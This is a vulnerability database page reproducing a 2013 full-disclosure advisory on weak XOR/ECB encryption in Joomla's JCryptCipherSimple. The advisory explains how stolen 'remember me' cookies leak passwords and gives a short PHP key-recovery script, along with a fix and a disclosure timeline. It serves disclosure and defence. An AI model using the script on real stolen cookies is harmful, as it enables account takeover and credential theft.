Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Cryptography Weakness

🗓️ 18 Jun 2013 00:00:00Reported by Marco BeiererType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Joomla cryptography weakness in JCryptCipherSimple allows easy key calculation, leading to plaintext decryption. Exploit via "remember me" cookie theft

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
# Vulnerable Application  
All current and past versions of Joomla (http://www.joomla.org) up to  
1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla  
framework (not tested). At the moment there is no vendor patch available.  
  
  
# The Problem  
The problem occurs in the implementation of JCryptCipherSimple. The  
JCryptCipherSimple encrypts a text with an simple XOR operation in the  
Electronic Codebook Mode (ECB). The ECB is insecure by design and  
normally just used for education purposes because of its simplicity.  
  
For the encryption, the plaintext is split into small blocks and  
encrypted block by block. Each block has the same length as the key.  
The mathematical equation for the encryption is:  
Ciphertext = Plaintext XOR Key  
  
If the ciphertext and at least one block of the plaintext is known, it  
is thus very easy to calculate the key. To calculate the key, the  
equation could be rearranged as follows:  
Key = Ciphertext XOR Plaintext  
  
So, if an attacker knows the plaintext corresponding to one block  
ciphertext, he is able to calculate the key and thus to decrypt the  
complete ciphertext.  
  
  
# An example in the Joomla core  
In the Joomla core the JCryptCipherSimple is used for the "remember  
me" function. There the serialized user credentials are encrypted with  
the JCryptCipherSimple. The serialized credentials look for example  
like this:  
a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";}  
  
The used key is 32 characters long. The first block to encrypt is thus:  
a:2:{s:8:"username";s:12:"the_us  
  
So the attacker must only know the beginning of the username of the  
victim to calculate the key and decrypt the second and third block  
(including the password of the victim).  
  
  
# Exploit the core vulnerability  
To exploit the vulnerability it is necessary to steal the "remember  
me" cookie of an user. This is for example possible through an XSS  
vulnerability.  
  
Then the key could be calculated with the script below. The script is  
written for the Joomla Platform 12.3. The used functions are identical  
with these used in the current versions of the CMS. To calculate the  
key it is necessary to set the variables $plaintext (known part of the  
credentials) and $ciphertext (content of the remember me cookie) and  
then execute the script. Maybe it is also necessary to adjust the path  
to the needed library files.  
  
  
# The exploit script  
require '../libraries/import.php';  
require_once '../libraries/legacy/application/application.php';  
  
class CalculateKey extends JApplicationCli {  
public function execute() {  
$plaintext = ''; // first part of serialized credentials  
$cyphertext = ''; // content of remember me cookie  
  
$key = new JCryptKey('simple', $plaintext, $plaintext);  
$crypt = new JCrypt(new JCryptCipherSimple, $key);  
$out = $crypt->decrypt($cyphertext);  
$out = substr($out, 0, 32);  
  
$this->out($out);  
}  
}  
JApplicationCli::getInstance('CalculateKey')->execute();  
  
  
# What else?  
The JCryptCipherSimple may also be used by third party developers in  
their Joomla extensions, so there is an unknown number of vulnerable  
extensions.  
  
  
# Solution  
A solution to the problem would be to rewrite the JCryptCipherSimple  
to be non-deterministic. This could be achieved by using another mode  
of operation. An alternative is to use another by the Joomla core  
provided cipher and remove the JCryptCipherSimple.  
  
  
# History  
2013.05.11 Vulnerability reported to the vendor  
2013.05.12 Vendor asked for details  
2013.05.12 Details and exploit provided to the vendor  
2013.05.30 Asked vendor about the status of investigation (no response)  
2013.06.11 Sent another mail to the vendor (no response)  
2013.06.15 Full disclosure  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.19 (GNU/Linux)  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEcBAEBAgAGBQJRwHrPAAoJEDIfni1i6osAU/YH/AghxYMCsshx36xANdvNJOzK  
k0bSCexjnXygIrmW8qWOYiSrcwvG27YCyuXK15vgckZi4b/SGi0Wr4GcEqT6y9zU  
s3F9okTRQCuupLOB/aPffKj8G1yh38CvZRhPp4FUTMd8HIyb/Tyr5QgGpVyGZI9f  
8C34zUkeDz9HysVWw+fzKjF9fb6g5YT63N9FWqEmFVfiA4pf8lev+GvXMJjv5jhO  
qKhw7q7pfGGZjMk3xdt/avcYGOoHxm7pFozQFqJzBYE9WscNd9S1het0677tZw6+  
rdsO9c5RhVcrSsgSySU/EmZvJUnZnI1923GjBdxLASEhu0wjViTRtwKbpSWeAGM=  
=j2cF  
-----END PGP SIGNATURE-----  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jun 2013 00:00Current
7.4High risk
Vulners AI Score7.4
joomlajcryptciphersimpleweaknessencryptionvulnerabilityexploitcookietheftpatchdisclosure
44